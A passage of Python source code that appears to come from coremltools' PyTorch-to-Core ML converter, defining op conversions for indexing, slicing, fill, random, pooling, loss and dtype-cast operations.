y_r = f_1, ..., f_r\n\n Which further translates to MIL cond as:\n _true = {\n t_1, ..., t_k = some::node(a_value_from_outer_block)\n return (t_1, ..., t_r)\n }\n _false = {\n f_1, ..., f_m = some::node(a_value_from_outer_block)\n return (f_1, ..., f_m)\n }\n \"\"\"\n name = node.name\n # inputs[0]: condition\n inputs = _get_inputs(context, node, expected=1)\n condition = inputs[0]\n\n assert len(node.blocks) == 2\n true_block = node.blocks[0]\n false_block = node.blocks[1]\n\n def _true_path():\n res = convert_block(context, true_block, [])\n return tuple(res)\n\n def _false_path():\n res = convert_block(context, false_block, [])\n return tuple(res)\n\n cond = mb.cond(\n pred=condition, _true_fn=_true_path, _false_fn=_false_path, name=name\n )\n # If the condition only returns one item, wrap it in a tuple.\n if not isinstance(cond, (tuple, list)):\n cond = (cond,)\n\n # Make sure the condition returned the expected number of outputs.\n assert len(cond) == len(node.outputs)\n for output_name, output_var in zip(node.outputs, cond):\n context.add(output_var, torch_name=output_name)\n\n\n@register_torch_op(torch_alias=[\"select_copy.int\"])\ndef select(context, node):\n inputs = _get_inputs(context, node, expected=3)\n _input = inputs[0]\n dim = inputs[1].val\n index = inputs[2]\n\n assert dim.shape == ()\n\n # NOTE:\n # Each index in @begin_array/@end_array corresponds to a dimension of @_input\n # Each val of those arrays corresponds to the start/end index to slice in that dimension\n rank = _input.rank\n\n begin_array = [0] * rank\n if index.val is None:\n # index value not known till runtime\n begin_array[dim] = index\n begin_array = mb.concat(values=begin_array, axis=0)\n else:\n # index value known now\n assert index.val.shape == ()\n begin_array[dim] = index.val\n\n end_array = [s if isinstance(s, int) else 0 for s in _input.shape]\n end_mask = [True] * rank\n squeeze_mask = [False] * rank\n squeeze_mask[dim] = True\n\n if index.val != -1:\n if index.val is None:\n # index value not know till runtime\n temp = mb.add(x=index, y=1)\n end_array[dim] = temp\n end_array = mb.concat(values=end_array, axis=0)\n else:\n end_array[dim] = index.val + 1\n end_mask[dim] = False\n\n slice_by_index = mb.slice_by_index(\n x=_input,\n begin=begin_array,\n end=end_array,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=node.name,\n )\n context.add(slice_by_index)\n\n\n@register_torch_op\ndef getitem(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n if not isinstance(inputs[0], (list, tuple)):\n raise AssertionError(\"Item selection is supported only on python list/tuple objects\")\n\n if inputs[1].val is None:\n raise AssertionError(\"Only static item selection supported\")\n\n try:\n index = int(inputs[1].val)\n except:\n raise AssertionError(\n f\"Index into python list/tuple needs to be integer. Provided value: {inputs[1].val}\"\n )\n\n out = inputs[0][index]\n\n if out is None:\n raise AssertionError(\n f\"coremltools lowering didn't handle/bind value at index {index}. Please inspect the lowering of parent op for its return value\"\n )\n\n context.add(out, torch_name=node.name)\n\n\n@register_torch_op\ndef type_as(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n if inputs[0].dtype == inputs[1].dtype:\n x = mb.identity(x=inputs[0], name=node.name)\n else:\n x = inputs[0]\n if inputs[1].dtype not in TYPE_TO_DTYPE_STRING:\n raise NotImplementedError(\n \"Tensor type {} cast is not supported.\".format(inputs[1].dtype)\n )\n x = mb.cast(x=x, dtype=TYPE_TO_DTYPE_STRING[inputs[1].dtype], name=node.name)\n\n context.add(x)\n\n\n@register_torch_op\ndef nonzero(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n nonzero = mb.non_zero(x=x, name=node.name)\n context.add(nonzero)\n\n\ndef _get_slice_params(context, data, inputs):\n def _expand_list_to_rank_1(arr):\n \"\"\"\n We make the elements in begin and end rank 1,\n so the pattern of ``squeeze -> expand_dims`` can be removed\n by the ``fuse_squeeze_expand_dims`` graph pass.\n \"\"\"\n for i, val in enumerate(arr):\n if isinstance(val, Var):\n if val.rank == 0:\n arr[i] = mb.expand_dims(x=val, axes=[0])\n else:\n arr[i] = np.array([val])\n return arr\n\n rank = data.rank\n begin = [0] * rank\n end = [0] * rank\n stride = [1] * rank\n begin_mask = [False] * rank\n end_mask = [False] * rank\n squeeze_mask = [False] * rank\n\n num_of_slice_set = len(inputs) // 3\n\n for i in range(num_of_slice_set):\n if inputs[3 * i + 1] is None:\n # This is pure index select\n idx = context[inputs[3 * i]]\n if idx.val is not None:\n idx = idx.val\n begin[i] = idx\n squeeze_mask[i] = True\n else:\n # This is a slice\n begin_var = context[inputs[3 * i]]\n end_var = context[inputs[3 * i + 1]]\n stride_var = context[inputs[3 * i + 2]]\n\n if begin_var is None:\n begin_mask[i] = True\n else:\n begin[i] = begin_var\n\n if end_var is None:\n end_mask[i] = True\n else:\n end[i] = end_var\n\n if stride_var is None:\n stride[i] = 1\n else:\n stride[i] = stride_var.val\n\n for i in range(num_of_slice_set, rank):\n begin_mask[i] = True\n end_mask[i] = True\n\n begin = _expand_list_to_rank_1(begin)\n eng = _expand_list_to_rank_1(end)\n begin = mb.concat(values=begin, axis=0)\n end = mb.concat(values=end, axis=0)\n\n return begin, end, stride, begin_mask, end_mask, squeeze_mask\n\n\ndef _translate_torch_tensor_assign(\n x,\n updates,\n begin,\n end,\n stride,\n begin_mask,\n end_mask,\n squeeze_mask,\n name,\n):\n return mb.torch_tensor_assign(\n x=x,\n updates=updates,\n begin=begin,\n end=end,\n stride=stride,\n begin_mask=begin_mask,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=name,\n )\n\n\n@register_torch_op\ndef _internal_op_tensor_inplace_copy(context, node):\n data = context[node.inputs[0]]\n updates = context[node.inputs[1]]\n begin, end, stride, begin_mask, end_mask, squeeze_mask = _get_slice_params(\n context, data, node.inputs[2:]\n )\n\n data, updates = promote_input_dtypes([data, updates])\n updated_x = _translate_torch_tensor_assign(\n x=data,\n updates=updates,\n begin=begin,\n end=end,\n stride=stride,\n begin_mask=begin_mask,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=node.name,\n )\n context.add(updated_x)\n\n\n@register_torch_op\ndef _internal_op_tensor_inplace_fill(context, node):\n data = context[node.inputs[0]]\n fill_scalar = context[node.inputs[1]]\n\n if len(node.inputs) == 2 and fill_scalar.val is not None:\n shape = mb.shape(x=data)\n if isinstance(fill_scalar.val, _np.ndarray):\n fill = mb.fill(shape=shape, value=fill_scalar.val.item())\n else:\n fill = mb.fill(shape=shape, value=fill_scalar)\n casted = mb.cast(x=fill, dtype=TYPE_TO_DTYPE_STRING[data.dtype], name=node.name)\n context.add(casted)\n return\n\n begin, end, stride, begin_mask, end_mask, squeeze_mask = _get_slice_params(\n context, data, node.inputs[2:]\n )\n if begin.val is None or end.val is None or any_symbolic(data.shape):\n raise ValueError(\"_internal_op_tensor_inplace_fill does not support dynamic index\")\n\n fill_shape = solve_slice_by_index_shape(\n data.shape, begin.val, end.val, stride, begin_mask, end_mask, squeeze_mask\n )\n update_values = _np.full(fill_shape, fill_scalar.val)\n\n data, update_values = promote_input_dtypes([data, update_values])\n\n updated_x = _translate_torch_tensor_assign(\n x=data,\n updates=update_values,\n begin=begin,\n end=end,\n stride=stride,\n begin_mask=begin_mask,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=node.name,\n )\n context.add(updated_x)\n\n\n@register_torch_op\ndef index_put(context, node):\n inputs = _get_inputs(context, node, expected=4)\n x = inputs[0]\n indices = inputs[1]\n values = inputs[2]\n accumulate = inputs[3].val\n rank = x.rank\n mode = \"add\" if accumulate else \"update\"\n\n indices_type = indices[0].sym_type.get_primitive()\n\n if types.is_bool(indices_type):\n assert len(indices) == 1, \"Unsupported index_put_ usage.\"\n indices = indices[0]\n assert (\n indices.shape == x.shape\n ), \"indices shape must equal to input shape for index put operation.\"\n indices = mb.cast(x=indices, dtype=\"int32\")\n indices = mb.non_zero(x=indices)\n\n if types.is_int(indices_type):\n if len(indices) > 1:\n indices = mb.stack(values=indices, axis=indices[0].rank)\n else:\n indices = mb.expand_dims(x=indices[0], axes=[-1])\n\n if len(values.shape) == 0:\n values = mb.expand_dims(x=values, axes=[0])\n\n if values.rank == 1 and values.shape[0] == 1:\n reps = value_at(mb.shape(x=indices), 0)\n reps = mb.expand_dims(x=reps, axes=[0])\n values = mb.tile(x=values, reps=reps)\n\n if is_current_opset_version_compatible_with(target.iOS17):\n # IOS17 `scatter_nd` behaviour is undefined for negative indices.\n cond = mb.greater_equal(x=indices, y=0)\n x_shape = mb.shape(x=x)\n indices_shape = mb.shape(x=indices)\n indices_last_dim = value_at(indices_shape, indices.rank - 1)\n indices_last_dim_expand = mb.expand_dims(x=indices_last_dim, axes=[0])\n slice_shape = mb.slice_by_size(x=x_shape, begin=[0], size=indices_last_dim_expand)\n indices = mb.select(\n cond=cond,\n a=indices,\n b=mb.add(x=indices, y=slice_shape),\n )\n result = mb.scatter_nd(data=x, indices=indices, updates=values, mode=mode, name=node.name)\n context.add(result)\n\n\n@register_torch_op\ndef index(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n indices = inputs[1]\n rank = x.rank\n\n \"\"\"\n Case 1: A single boolean index selection\n Ex:\n a = torch.rand(2, 3, 4)\n b = torch.rand(3, 4)\n index = b > 0.1\n c = a[:, b]\n\n For this case, the only non-None tensor is with dtype bool\n The true value indicates whether the element should be selected among the masked axes\n The output c is a tensor with shape (2, N), where N is the number of elements of b satisfying condition > 0.1\n \"\"\"\n boolean_indices_axis = []\n for i, index in enumerate(indices):\n if index is not None and types.is_bool(index.dtype):\n boolean_indices_axis.append(i)\n if len(boolean_indices_axis) == 1:\n # get the True element indices\n axis = boolean_indices_axis[0]\n axes = list(range(axis, axis + index.rank))\n index = indices[axis]\n index = mb.non_zero(x=index)\n\n # transpose the masked axes to the beginning\n perm = axes + [i for i in range(rank) if i not in axes]\n x = mb.transpose(x=x, perm=perm)\n x = mb.gather_nd(x=x, indices=index)\n\n # transpose the tensor back\n perm_back = list(range(1, x.rank))\n perm_back.insert(axis, 0)\n res = mb.transpose(x=x, perm=perm_back, name=node.name)\n context.add(res)\n return\n\n \"\"\"\n Case 2: Pure index selection\n Ex # 1 [Single dimension selection]:\n a = torch.rand(1,2,3,4)\n index = torch.tensor([0, 1])\n b = a[:,:,:,index]\n\n In this case, indices is a list [None, None, None, [0, 1]]]. The None element means the corresponding\n dimension is masked.\n\n b has shape (1,2,3,2).\n\n Ex # 2 [Multiple disconnected dimensions selection]:\n a = torch.rand(1,2,3,4)\n index = torch.tensor([0, 1])\n b = a[:,index,:,index]\n\n In this case, indices is a list [None, [0,1], None, [0,1]]\n\n b has shape (2,1,3),\n where b[0,:,:] = a[:,0,:,0] and b[1,:,:] = a[:,1,:,1]\n\n Ex # 3 [Multiple connected dimensions selection]:\n a = torch.rand(1,2,3,4)\n index_1 = torch.tensor([0, 1])\n index_2 = torch.tensor([0, 1])\n b = a[:,index_1,index_2,:]\n\n indices is a list [None, [0, 1], [0, 1], None]\n\n b has shape (1,2,4),\n where b[:,0,:] = a[:,0,0,:] and b[:,1,:] = a[:,1,1,:]\n\n Ex # 4 [Selection with boolean masks]:\n a = torch.rand(4,5)\n index_1 = [True, True, False, False]\n index_2 = [False, True, True, False, False]\n b = a[index_1, index_2]\n\n indices is a list [[True, True, False, False], [False, True, True, False, False]]\n\n In this case, index_1 and index_2 are interpreted as mask by indices of True,\n index_1 -> [0, 1]\n index_2 -> [1, 2]\n\n b has shape (2,),\n where b[0] = a[0, 1] and b[1] = a[1, 2]\n\n Ex # 5 [Broadcast selection]:\n a = torch.rand(1,2,3,4)\n index_1 = torch.tensor([0, 1])\n index_2 = torch.tensor([0])\n b = a[:,index_1,index_2,:]\n\n indices is a list [None, [0, 1], [0], None]\n\n In this case, index_2 is going to be broadcasted to [0, 0]\n\n b has shape (1,2,4),\n where b[:,0,:] = a[:,0,0,:] and b[:,1,:] = a[:,1,0,:]\n\n \"\"\"\n\n # get the index axes\n indices = indices + [None] * (x.rank - len(indices))\n indices_axes = []\n valid_indices = []\n for i, index in enumerate(indices):\n if index is not None:\n indices_axes.append(i)\n valid_indices.append(index)\n\n # If all elements in indices is None, simpily return the original tensor.\n if len(indices_axes) == 0:\n x = mb.identity(x=x, name=node.name)\n context.add(x)\n return\n\n # convert all indices to int type\n for i, indice in enumerate(valid_indices):\n if indice is not None and types.is_bool(indice.dtype):\n indice = mb.non_zero(x=indice)\n indice = mb.squeeze(x=indice, axes=[1])\n valid_indices[i] = indice\n\n # For the single index axis case, we can use mb.gather directly\n if len(indices_axes) == 1:\n axis = indices_axes[0]\n indices = valid_indices[0]\n if is_current_opset_version_compatible_with(target.iOS17):\n # IOS17 `gather` behaviour is undefined for negative indices.\n indices = mb.select(\n cond=mb.greater_equal(x=indices, y=0),\n a=indices,\n b=mb.add(x=indices, y=value_at(mb.shape(x=x), axis)),\n )\n x = mb.gather(x=x, indices=indices, axis=axis, name=node.name)\n context.add(x)\n return\n\n # For multiple index axes case, we delegate broadcast to np if there is no dynamic shape.\n if all(not any_symbolic(idx.shape) for idx in valid_indices):\n broadcasted_shape = _np.broadcast_shapes(*[idx.shape for idx in valid_indices])\n for i, index in enumerate(valid_indices):\n if (index.shape != broadcasted_shape) and index.val is not None:\n new_val = _np.broadcast_to(index.val, broadcasted_shape)\n valid_indices[i] = mb.const(\n val=new_val, name=index.name + \"_broadcasted\"\n )\n valid_indices = [mb.cast(x=index, dtype=\"int32\") for index in valid_indices]\n\n # First stack the index together\n indices_rank = valid_indices[0].rank\n indices = mb.stack(values=valid_indices, axis=indices_rank)\n\n # transpose the input tensor to gather the slicing index in front\n is_connected = True\n for i in range(1, len(indices_axes)):\n if indices_axes[i] != indices_axes[i - 1] + 1:\n is_connected = False\n break\n\n name = node.name + \"_transpose\" if is_connected else node.name\n perm = indices_axes + [axis for axis in range(x.rank) if axis not in indices_axes]\n x = mb.transpose(x=x, perm=perm)\n\n if is_current_opset_version_compatible_with(target.iOS17):\n # IOS17 `gather_nd` behaviour is undefined for negative indices.\n cond = mb.greater_equal(x=indices, y=0)\n x_shape = mb.shape(x=x)\n indices_shape = mb.shape(x=indices)\n indices_last_dim = value_at(indices_shape, indices.rank - 1)\n indices_last_dim_expand = mb.expand_dims(x=indices_last_dim, axes=[0])\n slice_shape = mb.slice_by_size(x=x_shape, begin=[0], size=indices_last_dim_expand)\n indices = mb.select(\n cond=cond,\n a=indices,\n b=mb.add(x=indices, y=slice_shape),\n )\n x = mb.gather_nd(x=x, indices=indices, name=name)\n\n # if the index axes are connect, we need to transpose it back\n if is_connected:\n new_dimensions = list(range(indices_axes[0], indices_axes[0] + indices_rank))\n new_perm = new_dimensions + [\n axis\n for axis in range(rank + indices_rank - len(indices_axes))\n if axis not in new_dimensions\n ]\n perm_back = [new_perm.index(axis) for axis in range(len(new_perm))]\n x = mb.transpose(x=x, perm=perm_back, name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef ones(context, node):\n inputs = _get_inputs(context, node, expected=[5, 6])\n size = inputs[0]\n # dtype = NUM_TO_TORCH_DTYPE[inputs[1].val] unused\n # layout = inputs[2] unused\n # device = inputs[3] unused\n # requires_grad = inputs[4] unused\n # out = inputs[5] unused\n if isinstance(size, list):\n size = mb.concat(values=size, axis=0)\n fill = mb.fill(shape=size, value=1.0, name=node.name)\n context.add(fill)\n\n\n@register_torch_op\ndef ones_like(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n if is_current_opset_version_compatible_with(target.iOS16):\n fill = mb.fill_like(ref_tensor=x, value=1.0, name=node.name)\n else:\n size = mb.shape(x=x)\n # dtype = NUM_TO_TORCH_DTYPE[inputs[1].val] unused\n # layout = inputs[2] unused\n # device = inputs[3] unused\n # requires_grad = inputs[4] unused\n # out = inputs[5] unused\n fill = mb.fill(shape=size, value=1.0, name=node.name)\n context.add(fill)\n\n\ndef _make_fill_op(size, val, name):\n assert val is not None\n if isinstance(size, list):\n size = mb.concat(values=size, axis=0)\n if types.is_float(size.dtype):\n size = mb.cast(x=size, dtype=\"int32\")\n fill = mb.fill(shape=size, value=val, name=name)\n return fill\n\n\n@register_torch_op\ndef full(context, node):\n inputs = _get_inputs(context, node)\n size = inputs[0]\n val = inputs[1].val\n result = _make_fill_op(size, val, node.name)\n context.add(result)\n\n\n@register_torch_op\ndef full_like(context, node):\n inputs = _get_inputs(context, node, expected=7)\n x = inputs[0]\n val = inputs[1].val\n if is_current_opset_version_compatible_with(target.iOS16):\n result = mb.fill_like(ref_tensor=x, value=val, name=node.name)\n else:\n size = mb.shape(x=inputs[0])\n result = _make_fill_op(size, val, node.name)\n context.add(result)\n\n\n@register_torch_op\ndef new_full(context, node):\n # The difference between \"new_full\" and \"full\" is that the \"new_full\" is called from\n # an existing tensor: tensor.new_full(size, fill_value), while the \"full\" is called\n # from the torch API: torch.full(size, fill_value).\n # But they are basically doing the same thing.\n inputs = _get_inputs(context, node)\n size = inputs[1]\n val = inputs[2].val\n result = _make_fill_op(size, val, node.name)\n context.add(result)\n\n@register_torch_op\ndef randint(context, node):\n inputs = _get_inputs(context, node, expected=(7, 8))\n low = mb.cast(x=inputs[0], dtype=\"fp32\")\n high = mb.cast(x=inputs[1], dtype=\"fp32\")\n shape = inputs[2]\n rand_uniform = mb.random_uniform(shape=shape, low=low, high=high)\n rand_int = mb.cast(x=rand_uniform, dtype=\"int32\", name=node.name)\n context.add(rand_int)\n\n@register_torch_op\ndef rand(context, node):\n shape, _, dtype, _, _ = _get_inputs(context, node)\n dtype = NUM_TO_DTYPE_STRING[TORCH_DTYPE_TO_NUM[dtype.val]] if dtype else \"fp32\"\n low, high = mb.cast(x=0.0, dtype=dtype), mb.cast(x=1.0, dtype=dtype)\n rand_uniform = mb.random_uniform(shape=shape, low=low, high=high)\n context.add(rand_uniform, node.name)\n\n@register_torch_op\ndef randn(context, node):\n inputs = _get_inputs(context, node, expected=[5, 6])\n shape = inputs[0]\n rand_normal = mb.random_normal(shape=shape)\n rand_fp32 = mb.cast(x=rand_normal, dtype=\"fp32\", name=node.name)\n context.add(rand_fp32)\n\n@register_torch_op\ndef randn_like(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n shape = mb.shape(x=x)\n rand_normal = mb.random_normal(shape=shape)\n rand_fp32 = mb.cast(x=rand_normal, dtype=\"fp32\", name=node.name)\n context.add(rand_fp32)\n\n@register_torch_op\ndef bitwise_not(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n dtype = x.dtype\n if types.is_int(dtype):\n x = mb.add(x=x, y=1)\n x = mb.mul(x=x, y=-1, name=node.name)\n elif types.is_bool(dtype):\n x = mb.logical_not(x=x, name=node.name)\n else:\n raise ValueError(\"Not supported type {} found for 'bitwise_not' op\".format(dtype))\n context.add(x)\n\n\n@register_torch_op(torch_alias=[\"and\"])\ndef bitwise_and(context, node):\n inputs = _get_inputs(context, node)\n\n input_dtypes = [i.dtype for i in inputs]\n if all(types.is_bool(input_dtype) for input_dtype in input_dtypes):\n logical_and(context, node)\n else:\n raise NotImplementedError(\n f\"The `bitwise_and` op only supports boolean input, but get {input_dtypes}.\"\n )\n\n\n@register_torch_op\ndef logical_not(context, node):\n # There is an optional `out` parameter in torch.logical_not.\n inputs = _get_inputs(context, node, expected=[1, 2])\n x = inputs[0]\n if not types.is_bool(x.dtype):\n x = mb.cast(x=x, dtype=\"bool\")\n res = mb.logical_not(x=x, name=node.name)\n context.add(res)\n\n\ndef _avg_pool(context, node, inputs):\n x = inputs[0]\n kernel_sizes = inputs[1]\n strides = inputs[2]\n if strides.op.op_type == \"const\" and (not list(strides.val)):\n strides = mb.const(val=kernel_sizes.val, name=strides.name)\n pad_type = \"custom\"\n # Need to explicitly state L-R, T-B pad\n pad = inputs[3]\n pad = _np.repeat(pad.val, 2)\n ceil_mode = inputs[4].val\n include_pad = inputs[5].val\n\n spatial_rank = len(pad) // 2\n if spatial_rank > 2 and ceil_mode is True and list(strides.val) != [1] * len(strides.val):\n # since MIL does not support ceil_mode for 3D pool,\n # need to adjust padding values if ceil_mode is True\n # ceil_mode only causes any difference though, if the strides are not 1\n x_spatial_dimensions = x.shape[-spatial_rank:]\n new_pad = _adjust_pad_for_ceil_mode(\n x_spatial_dimensions, kernel_sizes.val, strides.val, pad\n )\n if _np.sum(_np.abs(new_pad - pad)) > 1e-3:\n if include_pad:\n raise ValueError('pool3D with ceil mode=True and include_pad=True not supported')\n pad = new_pad\n\n pool = mb.avg_pool(\n x=x,\n kernel_sizes=kernel_sizes,\n strides=strides,\n pad_type=pad_type,\n pad=pad,\n name=node.name,\n exclude_padding_from_average=not include_pad,\n ceil_mode=ceil_mode if spatial_rank <= 2 else False,\n )\n context.add(pool)\n\n\n@register_torch_op\ndef avg_pool1d(context, node):\n inputs = _get_inputs(context, node, expected=6)\n _avg_pool(context, node, inputs)\n\n\n@register_torch_op\ndef avg_pool2d(context, node):\n inputs = _get_inputs(context, node, min_expected=6)\n divisor_override = None if len(inputs) < 7 else inputs[6]\n if divisor_override is not None:\n raise ValueError(\"divisor_override is not supported for avg_pool2d\")\n _avg_pool(context, node, inputs)\n\n\n@register_torch_op\ndef avg_pool3d(context, node):\n inputs = _get_inputs(context, node, expected=7)\n divisor_override = inputs[6]\n if divisor_override is not None:\n raise ValueError(\"divisor_override is not supported for avg_pool3d\")\n _avg_pool(context, node, inputs)\n\n\n@register_torch_op(torch_alias=[\"_log_softmax\"])\ndef log_softmax(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n axis = inputs[1]\n\n # input 2 is either out or half_to_float, so we ignore\n ignored = inputs[2]\n assert ignored is None or ignored.dtype == types.bool\n\n res = mb.softmax(x=x, axis=axis, name=node.name + \"_softmax\")\n res = mb.log(x=res, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"nll_loss_nd\"])\ndef nll_loss(context, node):\n inputs = _get_inputs(context, node, expected=5)\n\n x = inputs[0]\n target = inputs[1]\n weight = inputs[2]\n reduction = inputs[3]\n ignore_index = inputs[4]\n\n # mapping for reduction\n reduction_mapping = {0: \"none\", 1: \"mean\", 2: \"sum\"}\n reduction = reduction_mapping[reduction.val]\n\n # compute the weights loss\n batch_size = x.shape[0]\n class_num = x.shape[1]\n\n # only support weight and ignore_index both None\n if weight is not None:\n raise NotImplementedError(\"Only unity weight is supported for NLLLoss.\")\n if ignore_index.val != -100:\n raise NotImplementedError(\"ignore index not supported for NLLLoss.\")\n\n x = mb.cast(x=x, dtype=\"fp32\")\n x = mb.mul(x=x, y=-1.)\n\n target = mb.cast(x=target, dtype=\"int32\")\n labels = mb.one_hot(indices=target, one_hot_vector_size=class_num)\n labels = mb.cast(x=labels, dtype=\"fp32\")\n loss = mb.mul(x=x, y=labels)\n loss = mb.reduce_sum(x=loss, axes=[1])\n\n # reduction type\n if reduction == \"none\":\n out = mb.identity(x=loss, name=node.name)\n elif reduction == \"sum\":\n out = mb.reduce_sum(x=loss, axes=[0], keep_dims=False, name=node.name)\n elif reduction == \"mean\":\n out = mb.real_div(x=loss, y=_np.float32(batch_size))\n out = mb.reduce_sum(x=out, axes=[0], keep_dims=False, name=node.name)\n else:\n raise NotImplementedError(\"Unsupported reduction type for NLLLoss.\")\n\n context.add(out)\n\n\n@register_torch_op\ndef sigmoid(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.sigmoid(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef hardsigmoid(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.sigmoid_hard(x=inputs[0], alpha=1.0 / 6, beta=0.5, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef gelu(context, node):\n inputs = _get_inputs(context, node)\n assert len(inputs) in (1, 2)\n mode = None\n if len(inputs) == 2:\n approximate = inputs[1].val\n if approximate == \"tanh\":\n mode = \"TANH_APPROXIMATION\"\n else:\n assert approximate == \"none\"\n res = mb.gelu(x=inputs[0], mode=mode, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"slice\"])\ndef _slice(context, node):\n inputs = _get_inputs(context, node, expected=5)\n x = inputs[0]\n dim = inputs[1].val\n\n if inputs[2] and inputs[2].val is not None:\n start = inputs[2].val\n elif isinstance(inputs[2], Var):\n start = inputs[2]\n else:\n start = 0\n\n if inputs[3] and inputs[3].val is not None:\n end = inputs[3].val\n elif isinstance(inputs[3], Var):\n end = inputs[3]\n else:\n end = None\n\n step = inputs[4].val\n\n if start == 0 and end is None and step == 1:\n # Handling x[:], just pass through the tensor.\n context.add(x, node.name)\n return\n\n begin_array = [0] * len(x.shape)\n begin_array[dim] = start\n end_array = [s if isinstance(s, int) else 0 for s in x.shape]\n end_mask = [True] * len(x.shape)\n if end is not None:\n end_array[dim] = end\n end_mask[dim] = False\n\n if isinstance(start, Var):\n begin_array = mb.concat(values=begin_array, axis=0)\n\n if isinstance(end, Var):\n end_array = mb.concat(values=end_array, axis=0)\n\n kwargs = {\n \"x\": x,\n \"begin\": begin_array,\n \"end\": end_array,\n \"end_mask\": end_mask,\n \"name\": node.name,\n }\n\n if step != 1:\n stride_array = _np.array([1] * len(x.shape))\n stride_array[dim] = step\n kwargs[\"stride\"] = stride_array\n\n res = mb.slice_by_index(**kwargs)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"split_with_sizes\"])\ndef split(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n split_sizes = inputs[1]\n dim = inputs[2].val\n\n if not isinstance(split_sizes.val, _np.ndarray):\n shape = mb.shape(x=x)\n dim_size = _list_select(shape, dim)\n # MIL split op needs the size of each split to be given explicitly.\n num_whole_splits = mb.floor_div(x=dim_size, y=split_sizes)\n remainder = mb.mod(x=dim_size, y=split_sizes)\n\n # MIL doesn't have a way of turning a scalar into a tensor (list write\n # only supports tensors). As a workaround, we create a constant [1]\n # tensor and multiply it by the scalar value, thus creating a tensor\n # with the scalar value in it.\n tmp = mb.const(val=[1])\n whole_sizes = mb.mul(x=tmp, y=split_sizes)\n reps = mb.mul(x=tmp, y=num_whole_splits)\n whole_sizes = mb.tile(x=whole_sizes, reps=reps)\n if remainder.val == 0:\n split_sizes = whole_sizes\n else:\n partial_size = mb.mul(x=tmp, y=remainder)\n split_sizes = mb.concat(values=[whole_sizes, partial_size], axis=0)\n res = mb.split(x=x, split_sizes=split_sizes, axis=dim, name=node.name)\n context.add(res, torch_name=node.name)\n\n\n@register_torch_op\ndef unbind(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n dim = inputs[1].val\n split_sizes = [1] * x.shape[dim]\n if len(split_sizes) == 1:\n res = [mb.squeeze(x=x, axes=[dim])]\n else:\n res = mb.split(x=x, split_sizes=split_sizes, axis=dim, name=node.name)\n res = [mb.squeeze(x=x, axes=[dim]) for x in res]\n context.add(res, torch_name=node.name)\n\n\n@register_torch_op(torch_alias = [\"_to_copy\"])\ndef to(context, node):\n inputs = _get_inputs(context, node)\n\n # There are a lot of variants of `to` op.\n # - When len(inputs) is 7 or 8, we only care about the first two params (input and dtype).\n # - When len(inputs) == 6, the parameter is (input, _, dtype, non_blocking, copy, memory_format)\n # - When len(inputs) == 5, the parameter is (input, dtype, non_blocking, copy, memory_format)\n # - When len(inputs) == 4, the parameter is (input, dtype, non_blocking, copy)\n # - When len(inputs) == 3, the parameter is (input, non_blocking, copy)\n # We only use `input` and `dtype`, and `non_blocking` and `copy` are unused.\n _input = inputs[0]\n\n target_dtype: Optional[Var]\n inputs_len = len(inputs)\n if inputs_len in (4, 5, 7, 8):\n target_dtype = inputs[1]\n elif inputs_len == 6:\n target_dtype = inputs[2]\n elif inputs_len <= 3:\n target_dtype = None\n else:\n raise ValueError(\n \"Received invalid arguments for PyTorch conversion of op {}\".format(node)\n )\n\n if target_dtype is None:\n # When target_dtype is None, it means the input's dtype is already the target dtype.\n context.add(_input, torch_name=node.name)\n return\n elif types.is_scalar(target_dtype.sym_type) and target_dtype.val is not None:\n dtype = target_dtype.val\n else:\n # When the val of dtype is not available, bridge from the np dtype.\n np_type = nptype_from_builtin(target_dtype.dtype)\n dtype = NUMPY_DTYPE_TO_TORCH_NUM[np_type]\n\n torch_dtype = NUM_TO_TORCH_DTYPE[dtype]\n if isinstance(_input, Var) and _input.can_be_folded_to_const():\n # numpy -> torch -> torch cast -> numpy\n # This path is needed to use the mapping of passed in dtypes to torch dtypes.\n casted_input = torch.tensor(_input.val).type(torch_dtype).cpu().numpy()\n res = mb.const(val=casted_input, name=node.name)\n else:\n if dtype in NUM_TO_DTYPE_STRING:\n res = mb.cast(x=_input, dtype=NUM_TO_DTYPE_STRING[dtype], name=node.name)\n else:\n # For dtype that is not supported by mb.cast, we do it in best-effort to cast it to int\n # or float based on the dtype.\n np_dtype = NUM_TO_NUMPY_DTYPE[dtype]\n if _np.issubdtype(np_dtype, _np.integer):\n res = mb.cast(x=_input, dtype=\"int32\", name=node.name)\n elif _np.issubdtype(np_dtype, _np.floating):\n res = mb.cast(x=_input, dtype=\"fp32\", name=node.name)\n else:\n raise ValueError(f\"Unsupported op {node} with target dtype {np_dtype}\")\n context.add(res)\n\n\n@register_torch_op\ndef erf(context, node):\n inputs = _get_inputs(context, node, expected=1)\n _input = inputs[0]\n erf = mb.erf(x=_input, name=node.name)\n context.add(erf)\n\n\n@register_torch_op(torch_alias=[\"scalarimplicit\"])\ndef implicittensortonum(context, node):\n inputs = _get_inputs(context, node, expected=1)\n _input = inputs[0]\n\n if _input.shape == (): # already a scalar\n context.add(_input, node.name)\n else:\n assert _input.shape == (1,)\n # shape: (1,) -> ()\n squeeze = mb.squeeze(x=_input, name=node.name)\n context.add(squeeze)\n\n\n@register_torch_op\ndef constantchunk(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n # ConstantChunk gets its parameters as attributes of the 